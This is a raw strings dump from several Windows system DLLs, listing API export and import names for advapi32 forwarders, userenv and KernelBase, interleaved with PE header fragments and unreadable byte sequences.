advapi32.AllocateAndInitializeSid AllocateLocallyUniqueId advapi32.AllocateLocallyUniqueId AreAllAccessesGranted advapi32.AreAllAccessesGranted AreAnyAccessesGranted advapi32.AreAnyAccessesGranted CheckTokenMembership advapi32.CheckTokenMembership ConvertToAutoInheritPrivateObjectSecurity advapi32.ConvertToAutoInheritPrivateObjectSecurity CopySid advapi32.CopySid CreatePrivateObjectSecurity advapi32.CreatePrivateObjectSecurity CreatePrivateObjectSecurityEx advapi32.CreatePrivateObjectSecurityEx CreatePrivateObjectSecurityWithMultipleInheritance advapi32.CreatePrivateObjectSecurityWithMultipleInheritance CreateProcessAsUserW advapi32.CreateProcessAsUserW CreateRestrictedToken advapi32.CreateRestrictedToken CreateWellKnownSid advapi32.CreateWellKnownSid DeleteAce advapi32.DeleteAce DestroyPrivateObjectSecurity advapi32.DestroyPrivateObjectSecurity DuplicateToken advapi32.DuplicateToken DuplicateTokenEx advapi32.DuplicateTokenEx EqualDomainSid advapi32.EqualDomainSid EqualPrefixSid advapi32.EqualPrefixSid EqualSid advapi32.EqualSid EventActivityIdControl advapi32.EventActivityIdControl EventEnabled advapi32.EventEnabled EventProviderEnabled advapi32.EventProviderEnabled EventRegister advapi32.EventRegister EventUnregister advapi32.EventUnregister EventWrite advapi32.EventWrite EventWriteString advapi32.EventWriteString EventWriteTransfer advapi32.EventWriteTransfer FindFirstFreeAce advapi32.FindFirstFreeAce FreeSid advapi32.FreeSid GetAce advapi32.GetAce GetAclInformation advapi32.GetAclInformation GetFileSecurityW advapi32.GetFileSecurityW GetKernelObjectSecurity advapi32.GetKernelObjectSecurity GetLengthSid advapi32.GetLengthSid GetPrivateObjectSecurity advapi32.GetPrivateObjectSecurity GetSecurityDescriptorControl advapi32.GetSecurityDescriptorControl GetSecurityDescriptorDacl advapi32.GetSecurityDescriptorDacl GetSecurityDescriptorGroup advapi32.GetSecurityDescriptorGroup GetSecurityDescriptorLength advapi32.GetSecurityDescriptorLength GetSecurityDescriptorOwner advapi32.GetSecurityDescriptorOwner GetSecurityDescriptorRMControl advapi32.GetSecurityDescriptorRMControl GetSecurityDescriptorSacl advapi32.GetSecurityDescriptorSacl GetSidIdentifierAuthority advapi32.GetSidIdentifierAuthority GetSidLengthRequired advapi32.GetSidLengthRequired GetSidSubAuthority advapi32.GetSidSubAuthority GetSidSubAuthorityCount advapi32.GetSidSubAuthorityCount GetTokenInformation advapi32.GetTokenInformation GetTraceEnableFlags advapi32.GetTraceEnableFlags GetTraceEnableLevel advapi32.GetTraceEnableLevel GetTraceLoggerHandle advapi32.GetTraceLoggerHandle InitializeAcl advapi32.InitializeAcl InitializeSecurityDescriptor advapi32.InitializeSecurityDescriptor InitializeSid advapi32.InitializeSid IsTokenRestricted advapi32.IsTokenRestricted IsValidAcl advapi32.IsValidAcl IsValidSecurityDescriptor advapi32.IsValidSecurityDescriptor IsValidSid advapi32.IsValidSid MakeAbsoluteSD advapi32.MakeAbsoluteSD MakeSelfRelativeSD advapi32.MakeSelfRelativeSD OpenProcessToken advapi32.OpenProcessToken OpenThreadToken advapi32.OpenThreadToken PrivilegeCheck advapi32.PrivilegeCheck PrivilegedServiceAuditAlarmW advapi32.PrivilegedServiceAuditAlarmW QuerySecurityAccessMask advapi32.QuerySecurityAccessMask RegCloseKey advapi32.RegCloseKey RegCopyTreeW advapi32.RegCopyTreeW RegCreateKeyExA advapi32.RegCreateKeyExA RegCreateKeyExW advapi32.RegCreateKeyExW RegDeleteKeyExA advapi32.RegDeleteKeyExA RegDeleteKeyExW advapi32.RegDeleteKeyExW RegDeleteTreeA advapi32.RegDeleteTreeA RegDeleteTreeW advapi32.RegDeleteTreeW RegDeleteValueA advapi32.RegDeleteValueA RegDeleteValueW advapi32.RegDeleteValueW RegDisablePredefinedCacheEx advapi32.RegDisablePredefinedCacheEx RegEnumKeyExA advapi32.RegEnumKeyExA RegEnumKeyExW advapi32.RegEnumKeyExW RegEnumValueA advapi32.RegEnumValueA RegEnumValueW advapi32.RegEnumValueW RegFlushKey advapi32.RegFlushKey RegGetKeySecurity advapi32.RegGetKeySecurity RegGetValueA advapi32.RegGetValueA RegGetValueW advapi32.RegGetValueW RegLoadAppKeyA advapi32.RegLoadAppKeyA RegLoadAppKeyW advapi32.RegLoadAppKeyW RegLoadKeyA advapi32.RegLoadKeyA RegLoadKeyW advapi32.RegLoadKeyW RegLoadMUIStringA advapi32.RegLoadMUIStringA RegLoadMUIStringW advapi32.RegLoadMUIStringW RegNotifyChangeKeyValue advapi32.RegNotifyChangeKeyValue RegOpenCurrentUser advapi32.RegOpenCurrentUser RegOpenKeyExA advapi32.RegOpenKeyExA RegOpenKeyExW advapi32.RegOpenKeyExW RegOpenUserClassesRoot advapi32.RegOpenUserClassesRoot RegQueryInfoKeyA advapi32.RegQueryInfoKeyA RegQueryInfoKeyW advapi32.RegQueryInfoKeyW RegQueryValueExA advapi32.RegQueryValueExA RegQueryValueExW advapi32.RegQueryValueExW RegRestoreKeyA advapi32.RegRestoreKeyA RegRestoreKeyW advapi32.RegRestoreKeyW RegSaveKeyExA advapi32.RegSaveKeyExA RegSaveKeyExW advapi32.RegSaveKeyExW RegSetKeySecurity advapi32.RegSetKeySecurity RegSetValueExA advapi32.RegSetValueExA RegSetValueExW advapi32.RegSetValueExW RegUnLoadKeyA advapi32.RegUnLoadKeyA RegUnLoadKeyW advapi32.RegUnLoadKeyW RegisterTraceGuidsW advapi32.RegisterTraceGuidsW RevertToSelf advapi32.RevertToSelf SetAclInformation advapi32.SetAclInformation SetFileSecurityW advapi32.SetFileSecurityW SetKernelObjectSecurity advapi32.SetKernelObjectSecurity SetSecurityAccessMask advapi32.SetSecurityAccessMask SetSecurityDescriptorControl advapi32.SetSecurityDescriptorControl SetSecurityDescriptorDacl advapi32.SetSecurityDescriptorDacl SetSecurityDescriptorGroup advapi32.SetSecurityDescriptorGroup SetSecurityDescriptorOwner advapi32.SetSecurityDescriptorOwner SetSecurityDescriptorRMControl advapi32.SetSecurityDescriptorRMControl SetSecurityDescriptorSacl advapi32.SetSecurityDescriptorSacl SetTokenInformation advapi32.SetTokenInformation TraceEvent advapi32.TraceEvent TraceMessage advapi32.TraceMessage TraceMessageVa advapi32.TraceMessageVa UnregisterTraceGuids advapi32.UnregisterTraceGuids !This program cannot be run in DOS mode. Rich .text `.rsrc RSDS5 api-ms-win-downlevel-normaliz-l1-1-0.pdb api-ms-win-downlevel-normaliz-l1-1-0.dll IdnToAscii normaliz.IdnToAscii IdnToUnicode normaliz.IdnToUnicode !This program cannot be run in DOS mode. PiRichU .text `.orpc `.data .rsrc @.reloc msvcrt.dll ntdll.dll KERNELBASE.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll API-MS-Win-Core-File-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-Heap-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-IO-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Security-Base-L1-1-0.dll RPCRT4.dll profapi.dll KERNEL32.dll tNrw 2qw? Nrw: qwWt qwPr >!~w^!~w M}w{M}w1 0xui xu#"xuz ow'Wqw USERENV.dll CreateEnvironmentBlock CreateProfile DeleteProfileA DeleteProfileW DestroyEnvironmentBlock DllCanUnloadNow DllGetClassObject DllGetContractDescription DllRegisterServer DllUnregisterServer EnterCriticalPolicySection ExpandEnvironmentStringsForUserA ExpandEnvironmentStringsForUserW ForceSyncFgPolicy FreeGPOListA FreeGPOListW GetAllUsersProfileDirectoryA GetAllUsersProfileDirectoryW GetAppliedGPOListA GetAppliedGPOListW GetDefaultUserProfileDirectoryA GetDefaultUserProfileDirectoryW GetGPOListA GetGPOListW GetNextFgPolicyRefreshInfo GetPreviousFgPolicyRefreshInfo GetProfileType GetProfilesDirectoryA GetProfilesDirectoryW GetUserProfileDirectoryA GetUserProfileDirectoryW LeaveCriticalPolicySection LoadUserProfileA LoadUserProfileW ProcessGroupPolicyCompleted ProcessGroupPolicyCompletedEx RefreshPolicy RefreshPolicyEx RegisterGPNotification RsopAccessCheckByType RsopFileAccessCheck RsopLoggingEnabled RsopResetPolicySettingStatus RsopSetPolicySettingStatus UnloadUserProfile UnregisterGPNotification WaitForMachinePolicyForegroundProcessing WaitForUserPolicyForegroundProcessing h@1|u QSVW 1|ut 1|u1E Y__^[ VW9E 01|uSV 1|uj 1|u3 \5|u 1|u3 @_^[] , {u j,hp 1|u; X5|u; u 9u 1|u3 5|uV {uh81|uhP1|uht =(1|u 1|u^= 1|ut 1|u] 85|u 1|u 1|u_[ 1|uW PVhJ `5|u 1|u~v 01|uj 1|u % 1|u X5|u; h81|u 1|uW 1|u; 1|u_^ t$f9 FFJu uMRRS p%{u QRPh` 1|u3 0|uQRPh QRPh AACCN _^[] 1|u3 1|u3 1|u; {uPh 1|u= 1|ut Php,{u hX,{u 1|u3 1|u9 1|u9 1|u; 1|ut 5d5|u h@1|uPh -{u {u /{u U%fn /{u r/{u h@1|u X-{u IProfileNotify dK`jjU 1|u3 SSSSSS 1|u3 j:Xf 5(1|u 1|uti 1|ut' 0SVW3 @@f; @@f; @@f; {u_^[ {u_^ U S3 t*f9 @@API-MS-Win-Security-SDDL-L1-1-0.dll ADVAPI32.dll DNSAPI.dll IPHLPAPI.DLL logoncli.dll netutils.dll ole32.dll SspiCli.dll SHLWAPI.dll SHELL32.dll GPAPI.dll GPSVC.dll ConvertSidToStringSidW GetUserNameW SetSecurityInfo SetNamedSecurityInfoW SetEntriesInAclW DnsNameCompare_W GetIfEntry IcmpCreateFile IcmpCloseHandle GetBestInterface IcmpSendEcho DsEnumerateDomainTrustsW NetApiBufferFree CoCreateInstance CoInitialize CoUninitialize GetUserNameExW PathGetArgsW PathUnquoteSpacesW SHSetLocalizedName SHGetSpecialFolderPathW SHChangeNotify FreeGPOListInternalA GetGPOListInternalA RefreshPolicyInternal RefreshPolicyExInternal EnterCriticalPolicySectionInternal ForceSyncFgPolicyInternal GetNextFgPolicyRefreshInfoInternal GetPreviousFgPolicyRefreshInfoInternal WaitForUserPolicyForegroundProcessingInternal WaitForMachinePolicyForegroundProcessingInternal RsopLoggingEnabledInternal GetAppliedGPOListInternalW FreeGPOListInternalW GetGPOListInternalW UnregisterGPNotificationInternal RegisterGPNotificationInternal LeaveCriticalPolicySectionInternal GetAppliedGPOListInternalA RsopResetPolicySettingStatusInternal ProcessGroupPolicyCompletedExInternal RsopAccessCheckByTypeInternal RsopFileAccessCheckInternal RsopSetPolicySettingStatusInternal ProcessGroupPolicyCompletedInternal KERNEL32.dll profapi.dll RPCRT4.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-IO-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-Heap-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-File-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll KERNELBASE.dll ntdll.dll msvcrt.dll memmove _XcptFilter _initterm _amsg_exit _except_handler4_common _vsnwprintf ??3@YAXPAX@Z ??2@YAPAXI@Z memcpy malloc free memset RtlNtStatusToDosError RtlAdjustPrivilege EtwEventWrite EtwUnregisterTraceGuids RtlExpandEnvironmentStrings NtClose RtlIsDosDeviceName_U RtlAnsiCharToUnicodeChar RtlIntegerToChar RtlInitUnicodeStringEx EtwEventRegister EtwLogTraceEvent EtwEventUnregister EtwTraceMessage EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwRegisterTraceGuidsW EtwGetTraceLoggerHandle BemFreeReference BemCreateReference GetSystemDefaultUILanguage GetLastError UnhandledExceptionFilter SetUnhandledExceptionFilter SetLastError GetFileAttributesW CreateFileW CompareFileTime CreateDirectoryW RemoveDirectoryW GetFileAttributesExW DeleteFileW FindNextFileW SetFileAttributesW FindClose SetFileTime GetDiskFreeSpaceExW FlushFileBuffers FindFirstFileW CloseHandle HeapAlloc GetProcessHeap HeapReAlloc HeapFree InterlockedIncrement InterlockedCompareExchange InterlockedExchange DeviceIoControl DisableThreadLibraryCalls LockResource FindResourceExW GetModuleFileNameW GetProcAddress FreeLibrary LoadLibraryExA LoadStringW LoadResource RegOpenKeyExW RegCloseKey RegQueryValueExW RegGetValueW LocalAlloc LocalReAlloc Sleep lstrlenW FormatMessageW LocalFree GetCurrentThread TerminateProcess GetCurrentProcessId GetCurrentThreadId GetCurrentProcess OpenProcessToken CreateThread SetThreadToken OpenThreadToken QueryPerformanceCounter CompareStringOrdinal WideCharToMultiByte MultiByteToWideChar SetEvent DeleteCriticalSection WaitForSingleObject CreateEventW EnterCriticalSection InitializeCriticalSectionAndSpinCount LeaveCriticalSection GetTickCount GetSystemTimeAsFileTime AddAccessAllowedAce PrivilegeCheck EqualSid GetSecurityDescriptorOwner GetFileSecurityW ImpersonateSelf AllocateAndInitializeSid GetLengthSid InitializeAcl AddAccessDeniedAce FreeSid CopySid GetTokenInformation RevertToSelf ImpersonateLoggedOnUser NdrOleAllocate NdrOleFree IUnknown_QueryInterface_Proxy IUnknown_AddRef_Proxy IUnknown_Release_Proxy CStdStubBuffer_QueryInterface CStdStubBuffer_AddRef CStdStubBuffer_Connect CStdStubBuffer_Disconnect CStdStubBuffer_Invoke CStdStubBuffer_IsIIDSupported CStdStubBuffer_CountRefs CStdStubBuffer_DebugServerQueryInterface CStdStubBuffer_DebugServerRelease NdrDllUnregisterProxy NdrDllRegisterProxy NdrCStdStubBuffer_Release NdrDllCanUnloadNow NdrDllGetClassObject NdrClientCall2 I_RpcExceptionFilter RpcBindingSetAuthInfoExW RpcBindingFree RpcStringBindingComposeW RpcBindingFromStringBindingW RpcStringFreeW RpcRevertToSelf MoveFileExW DelayLoadFailureHook FindResourceW SearchPathW WaitForMultipleObjects CreateSymbolicLinkW PrivCopyFileExW RSDS userenv.pdb {uNZ{uH 2{u8 {uK'{u {u7'{u &{uA'{u -{u+0{u 0{u {u85|u CRIM WEVT CHAN8 TTBL TEMP TEMP -v>u TEMPP TEMPX OPCO LEVL4 TASK KEYW EVNT WANG2 JFIF (:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc /cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz F_k6 o&%MZ !This program cannot be run in DOS mode. Rich .text `.rsrc @.reloc RSDS K M: api-ms-win-downlevel-version-l1-1-0.pdb api-ms-win-downlevel-version-l1-1-0.dll GetFileVersionInfoExW version.GetFileVersionInfoExW GetFileVersionInfoSizeExW version.GetFileVersionInfoSizeExW VerFindFileA version.VerFindFileA VerFindFileW version.VerFindFileW VerQueryValueA version.VerQueryValueA VerQueryValueW version.VerQueryValueW !This program cannot be run in DOS mode. Rich3 .text `.data .rsrc @.reloc Y__^[ KERNELBASE.dll AccessCheck AccessCheckAndAuditAlarmW AccessCheckByType AccessCheckByTypeAndAuditAlarmW AccessCheckByTypeResultList AccessCheckByTypeResultListAndAuditAlarmByHandleW AccessCheckByTypeResultListAndAuditAlarmW AcquireSRWLockExclusive AcquireSRWLockShared AddAccessAllowedAce AddAccessAllowedAceEx AddAccessAllowedObjectAce AddAccessDeniedAce AddAccessDeniedAceEx AddAccessDeniedObjectAce AddAce AddAuditAccessAce AddAuditAccessAceEx AddAuditAccessObjectAce AddDllDirectory AddMandatoryAce AdjustTokenGroups AdjustTokenPrivileges AllocateAndInitializeSid AllocateLocallyUniqueId AreAllAccessesGranted AreAnyAccessesGranted AreFileApisANSI BaseDllFreeResourceId BaseDllMapResourceIdW BaseGetProcessDllPath BaseGetProcessExePath BaseInvalidateDllSearchPathCache BaseInvalidateProcessSearchPathCache BaseReleaseProcessDllPath BaseReleaseProcessExePath Beep BemCopyReference BemCreateContractFrom BemCreateReference BemFreeContract BemFreeReference CallbackMayRunLong CancelIoEx CancelThreadpoolIo CancelWaitableTimer ChangeTimerQueueTimer CheckGroupPolicyEnabled CheckTokenMembership CloseHandle CloseThreadpool CloseThreadpoolCleanupGroup CloseThreadpoolCleanupGroupMembers CloseThreadpoolIo CloseThreadpoolTimer CloseThreadpoolWait CloseThreadpoolWork CompareFileTime CompareStringA CompareStringEx CompareStringOrdinal CompareStringW ConnectNamedPipe ConvertDefaultLocale ConvertToAutoInheritPrivateObjectSecurity CopySid CreateDirectoryA CreateDirectoryW CreateEventA CreateEventExA CreateEventExW CreateEventW CreateFileA CreateFileMappingNumaW CreateFileMappingW CreateFileW CreateIoCompletionPort CreateMutexA CreateMutexExA CreateMutexExW CreateMutexW CreateNamedPipeW CreatePipe CreatePrivateObjectSecurity CreatePrivateObjectSecurityEx CreatePrivateObjectSecurityWithMultipleInheritance CreateRemoteThread CreateRemoteThreadEx CreateRestrictedToken CreateSemaphoreExW CreateThread CreateThreadpool CreateThreadpoolCleanupGroup CreateThreadpoolIo CreateThreadpoolTimer CreateThreadpoolWait CreateThreadpoolWork CreateTimerQueue CreateTimerQueueTimer CreateWaitableTimerExW CreateWellKnownSid DebugBreak DecodePointer DecodeSystemPointer DefineDosDeviceW DeleteAce DeleteCriticalSection DeleteFileA DeleteFileW DeleteProcThreadAttributeList DeleteTimerQueueEx DeleteTimerQueueTimer DeleteVolumeMountPointW DestroyPrivateObjectSecurity DeviceIoControl DisableThreadLibraryCalls DisassociateCurrentThreadFromCallback DisconnectNamedPipe DuplicateHandle DuplicateToken DuplicateTokenEx EncodePointer EncodeSystemPointer EnterCriticalSection EnumCalendarInfoExEx EnumCalendarInfoExW EnumCalendarInfoW EnumDateFormatsExEx EnumDateFormatsExW EnumDateFormatsW EnumLanguageGroupLocalesW EnumSystemCodePagesW EnumSystemLanguageGroupsW EnumSystemLocalesA EnumSystemLocalesEx EnumSystemLocalesW EnumTimeFormatsEx EnumTimeFormatsW EnumUILanguagesW EqualDomainSid EqualPrefixSid EqualSid ExitProcess ExitThread ExpandEnvironmentStringsA ExpandEnvironmentStringsW FatalAppExitA FatalAppExitW FileTimeToLocalFileTime FileTimeToSystemTime FindClose FindCloseChangeNotification FindFirstChangeNotificationA FindFirstChangeNotificationW FindFirstFileA FindFirstFileExA FindFirstFileExW FindFirstFileW FindFirstFreeAce FindFirstVolumeW FindNLSString FindNLSStringEx FindNextChangeNotification FindNextFileA FindNextFileW FindNextVolumeW FindResourceExW FindStringOrdinal FindVolumeClose FlsAlloc FlsFree FlsGetValue FlsSetValue FlushFileBuffers FlushProcessWriteBuffers FlushViewOfFile FoldStringW FormatMessageA FormatMessageW FreeEnvironmentStringsA FreeEnvironmentStringsW FreeLibrary FreeLibraryAndExitThread FreeLibraryWhenCallbackReturns FreeResource FreeSid GetACP GetAce GetAclInformation GetCPFileNameFromRegistry GetCPHashNode GetCPInfo GetCPInfoExW GetCalendar GetCalendarInfoEx GetCalendarInfoW GetCommandLineA GetCommandLineW GetComputerNameExA GetComputerNameExW GetCurrencyFormatEx GetCurrencyFormatW GetCurrentDirectoryA GetCurrentDirectoryW GetCurrentProcess GetCurrentProcessId GetCurrentThread GetCurrentThreadId GetDiskFreeSpaceA GetDiskFreeSpaceExA GetDiskFreeSpaceExW GetDiskFreeSpaceW GetDriveTypeA GetDriveTypeW GetDynamicTimeZoneInformation GetEnvironmentStrings GetEnvironmentStringsA GetEnvironmentStringsW GetEnvironmentVariableA GetEnvironmentVariableW GetEraNameCountedString GetErrorMode GetExitCodeProcess GetExitCodeThread GetFallbackDisplayName GetFileAttributesA GetFileAttributesExA GetFileAttributesExW GetFileAttributesW GetFileInformationByHandle GetFileMUIInfo GetFileMUIPath GetFileSecurityW GetFileSize GetFileSizeEx GetFileTime GetFileType GetFinalPathNameByHandleA GetFinalPathNameByHandleW GetFullPathNameA GetFullPathNameW GetHandleInformation GetKernelObjectSecurity GetLastError GetLengthSid GetLocalTime GetLocaleInfoA GetLocaleInfoEx GetLocaleInfoHelper GetLocaleInfoW GetLogicalDriveStringsW GetLogicalDrives GetLogicalProcessorInformation GetLogicalProcessorInformationEx GetLongPathNameA GetLongPathNameW GetModuleFileNameA GetModuleFileNameW GetModuleHandleA GetModuleHandleExA GetModuleHandleExW GetModuleHandleW GetNLSVersion GetNLSVersionEx GetNamedLocaleHashNode GetNamedPipeAttribute GetNamedPipeClientComputerNameW GetNumberFormatEx GetNumberFormatW GetOEMCP GetOverlappedResult GetPriorityClass GetPrivateObjectSecurity GetProcAddress GetProcessHeap GetProcessHeaps GetProcessId GetProcessIdOfThread GetProcessPreferredUILanguages GetProcessTimes GetProcessVersion GetPtrCalData GetPtrCalDataArray GetQueuedCompletionStatus GetQueuedCompletionStatusEx GetSecurityDescriptorControl GetSecurityDescriptorDacl GetSecurityDescriptorGroup GetSecurityDescriptorLength GetSecurityDescriptorOwner GetSecurityDescriptorRMControl GetSecurityDescriptorSacl GetShortPathNameW GetSidIdentifierAuthority GetSidLengthRequired GetSidSubAuthority GetSidSubAuthorityCount GetStartupInfoW GetStdHandle GetStringTableEntry GetStringTypeA GetStringTypeExW GetStringTypeW GetSystemDefaultLCID GetSystemDefaultLangID GetSystemDefaultLocaleName GetSystemDefaultUILanguage GetSystemDirectoryA GetSystemDirectoryW GetSystemInfo GetSystemPreferredUILanguages GetSystemTime GetSystemTimeAdjustment GetSystemTimeAsFileTime GetSystemWindowsDirectoryA GetSystemWindowsDirectoryW GetTempFileNameW GetThreadId GetThreadLocale GetThreadPreferredUILanguages GetThreadPriority GetThreadPriorityBoost GetThreadUILanguage GetTickCount GetTickCount64 GetTimeZoneInformation GetTimeZoneInformationForYear GetTokenInformation GetUILanguageInfo GetUserDefaultLCID GetUserDefaultLangID GetUserDefaultLocaleName GetUserDefaultUILanguage GetUserInfo GetUserInfoWord GetUserPreferredUILanguages GetVersion GetVersionExA GetVersionExW GetVolumeInformationByHandleW GetVolumeInformationW GetVolumePathNameW GetWindowsAccountDomainSid GetWindowsDirectoryA GetWindowsDirectoryW GlobalAlloc GlobalFree GlobalMemoryStatusEx HeapAlloc HeapCompact HeapCreate HeapDestroy HeapFree HeapLock HeapQueryInformation HeapReAlloc HeapSetInformation HeapSize HeapSummary HeapUnlock HeapValidate HeapWalk ImpersonateAnonymousToken ImpersonateLoggedOnUser ImpersonateNamedPipeClient ImpersonateSelf InitializeAcl InitializeCriticalSection InitializeCriticalSectionAndSpinCount InitializeCriticalSectionEx InitializeProcThreadAttributeList InitializeSListHead InitializeSRWLock InitializeSecurityDescriptor InitializeSid InterlockedCompareExchange InterlockedCompareExchange64 InterlockedDecrement InterlockedExchange InterlockedExchangeAdd InterlockedFlushSList InterlockedIncrement InterlockedPopEntrySList InterlockedPushEntrySList InterlockedPushListSList InternalLcidToName Internal_EnumCalendarInfo Internal_EnumDateFormats Internal_EnumLanguageGroupLocales Internal_EnumSystemCodePages Internal_EnumSystemLanguageGroups Internal_EnumSystemLocales Internal_EnumTimeFormats Internal_EnumUILanguages InvalidateTzSpecificCache IsDBCSLeadByte IsDBCSLeadByteEx IsDebuggerPresent IsNLSDefinedString IsProcessInJob IsThreadpoolTimerSet IsTokenRestricted IsValidAcl IsValidCodePage IsValidLanguageGroup IsValidLocale IsValidLocaleName IsValidRelativeSecurityDescriptor IsValidSecurityDescriptor IsValidSid IsWellKnownSid IsWow64Process KernelBaseGetGlobalData LCIDToLocaleName LCMapStringA LCMapStringEx LCMapStringW LeaveCriticalSection LeaveCriticalSectionWhenCallbackReturns LoadLibraryExA LoadLibraryExW LoadResource LoadStringA LoadStringBaseExW LoadStringByReference LoadStringW LocalAlloc LocalFileTimeToFileTime LocalFree LocalLock LocalReAlloc LocalUnlock LocaleNameToLCID LockFile LockFileEx LockResource MakeAbsoluteSD MakeAbsoluteSD2 MakeSelfRelativeSD MapGenericMask MapViewOfFile MapViewOfFileEx MapViewOfFileExNuma MultiByteToWideChar NeedCurrentDirectoryForExePathA NeedCurrentDirectoryForExePathW NlsCheckPolicy NlsDispatchAnsiEnumProc NlsEventDataDescCreate NlsGetACPFromLocale NlsGetCacheUpdateCount NlsIsUserDefaultLocale NlsUpdateLocale NlsUpdateSystemLocale NlsValidateLocale NlsWriteEtwEvent NotifyMountMgr NotifyRedirectedStringChange ObjectCloseAuditAlarmW ObjectDeleteAuditAlarmW ObjectOpenAuditAlarmW ObjectPrivilegeAuditAlarmW OpenEventA OpenEventW OpenFileMappingW OpenMutexW OpenProcess OpenProcessToken OpenRegKey OpenSemaphoreW OpenThread OpenThreadToken OpenWaitableTimerW OutputDebugStringA OutputDebugStringW PeekNamedPipe PostQueuedCompletionStatus PrivilegeCheck PrivilegedServiceAuditAlarmW ProcessIdToSessionId PulseEvent QueryDepthSList QueryDosDeviceW QueryPerformanceCounter QueryPerformanceFrequency QueryProcessAffinityUpdateMode QuerySecurityAccessMask QueryThreadpoolStackInformation QueueUserAPC RaiseException ReadFile ReadFileEx ReadFileScatter ReadProcessMemory RegisterWaitForSingleObjectEx ReleaseMutex ReleaseMutexWhenCallbackReturns ReleaseSRWLockExclusive ReleaseSRWLockShared ReleaseSemaphore ReleaseSemaphoreWhenCallbackReturns RemoveDirectoryA RemoveDirectoryW RemoveDllDirectory ResetEvent ResolveLocaleName ResumeThread RevertToSelf SearchPathW SetAclInformation SetCalendarInfoW SetCriticalSectionSpinCount SetCurrentDirectoryA SetCurrentDirectoryW SetDefaultDllDirectories SetEndOfFile SetEnvironmentStringsW SetEnvironmentVariableA SetEnvironmentVariableW SetErrorMode SetEvent SetEventWhenCallbackReturns SetFileApisToANSI SetFileApisToOEM SetFileAttributesA SetFileAttributesW SetFileInformationByHandle SetFilePointer SetFilePointerEx SetFileSecurityW SetFileTime SetFileValidData SetHandleCount SetHandleInformation SetKernelObjectSecurity SetLastError SetLocalTime SetLocaleInfoW SetNamedPipeHandleState SetPriorityClass SetPrivateObjectSecurity SetPrivateObjectSecurityEx SetProcessAffinityUpdateMode SetProcessShutdownParameters SetSecurityAccessMask SetSecurityDescriptorControl SetSecurityDescriptorDacl SetSecurityDescriptorGroup SetSecurityDescriptorOwner SetSecurityDescriptorRMControl SetSecurityDescriptorSacl SetStdHandle SetStdHandleEx SetThreadLocale SetThreadPriority SetThreadPriorityBoost SetThreadStackGuarantee SetThreadToken SetThreadpoolStackInformation SetThreadpoolThreadMaximum SetThreadpoolThreadMinimum SetThreadpoolTimer SetThreadpoolWait SetTokenInformation SetWaitableTimer SetWaitableTimerEx SizeofResource Sleep SleepEx SpecialMBToWC StartThreadpoolIo SubmitThreadpoolWork SuspendThread SwitchToThread SystemTimeToFileTime SystemTimeToTzSpecificLocalTime SystemTimeToTzSpecificLocalTimeEx TerminateProcess TerminateThread TlsAlloc TlsFree TlsGetValue TlsSetValue TransactNamedPipe TryAcquireSRWLockExclusive TryAcquireSRWLockShared TryEnterCriticalSection TrySubmitThreadpoolCallback TzSpecificLocalTimeToSystemTime TzSpecificLocalTimeToSystemTimeEx UnlockFile UnlockFileEx UnmapViewOfFile UnregisterWaitEx UpdateProcThreadAttribute VerLanguageNameA VerLanguageNameW VirtualAlloc VirtualAllocEx VirtualAllocExNuma VirtualFree VirtualFreeEx VirtualProtect VirtualProtectEx VirtualQuery VirtualQueryEx WaitForMultipleObjectsEx WaitForSingleObject WaitForSingleObjectEx WaitForThreadpoolIoCallbacks WaitForThreadpoolTimerCallbacks WaitForThreadpoolWaitCallbacks WaitForThreadpoolWorkCallbacks WaitNamedPipeW WideCharToMultiByte Wow64DisableWow64FsRedirection Wow64RevertWow64FsRedirection WriteFile WriteFileEx WriteFileGather WriteProcessMemory lstrcmp lstrcmpA lstrcmpW lstrcmpi lstrcmpiA lstrcmpiW lstrcpyn lstrcpynA lstrcpynW lstrlen lstrlenA lstrlenW NTDLL.RtlAcquireSRWLockExclusive NTDLL.RtlAcquireSRWLockShared NTDLL.TpCancelAsyncIoOperation NTDLL.TpReleasePool NTDLL.TpReleaseCleanupGroup NTDLL.TpReleaseCleanupGroupMembers NTDLL.TpReleaseIoCompletion NTDLL.TpReleaseTimer NTDLL.TpReleaseWait NTDLL.TpReleaseWork NTDLL.RtlDecodePointer NTDLL.RtlDecodeSystemPointer NTDLL.RtlDeleteCriticalSection NTDLL.TpDisassociateCallback NTDLL.RtlEncodePointer NTDLL.RtlEncodeSystemPointer NTDLL.RtlEnterCriticalSection NTDLL.RtlExitUserThread NTDLL.NtFlushProcessWriteBuffers NTDLL.TpCallbackUnloadDllOnCompletion NTDLL.RtlAllocateHeap NTDLL.RtlFreeHeap NTDLL.RtlReAllocateHeap NTDLL.RtlSizeHeap NTDLL.RtlInitializeCriticalSection NTDLL.RtlInitializeSListHead NTDLL.RtlInitializeSRWLock NTDLL.RtlInterlockedCompareExchange64 NTDLL.RtlInterlockedFlushSList NTDLL.RtlInterlockedPopEntrySList NTDLL.RtlInterlockedPushEntrySList NTDLL.RtlInterlockedPushListSList NTDLL.TpIsTimerSet 